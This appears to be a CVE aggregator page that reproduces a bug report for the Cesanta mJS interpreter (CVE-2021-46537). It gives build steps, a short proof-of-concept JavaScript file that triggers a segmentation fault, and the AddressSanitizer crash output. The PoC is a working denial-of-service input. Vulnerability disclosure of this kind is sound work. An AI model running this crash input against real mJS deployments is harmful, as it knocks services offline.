Headline

CVE-2021-46537: SEGV (/usr/local/bin/mjs+0x9a30e) · Issue #212 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x9a30e. This vulnerability can lead to a Denial of Service (DoS).

2 years ago

CVE

Open in Source

#vulnerability #ubuntu #linux #dos #js

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

function Aply() {
    return Object.create.apply({}, [Object]);
}
function JSEtest(i) {
    return Aply(i, 1, 2, 3);
}
JSEtest(89)[Object.create--]
JSEtest(0.2)

Execution steps & Output

$ ./mjs/build/mjs poc.js

ASAN:DEADLYSIGNAL

==87532==ERROR: AddressSanitizer: SEGV on unknown address 0x55d1329c929c (pc 0x55d1329c930f bp 0x615000000080 sp 0x7ffe4957a058 T0) ==87532==The signal is caused by a WRITE memory access. #0 0x55d1329c930e (/usr/local/bin/mjs+0x9a30e)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x9a30e) ==87532==ABORTING

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago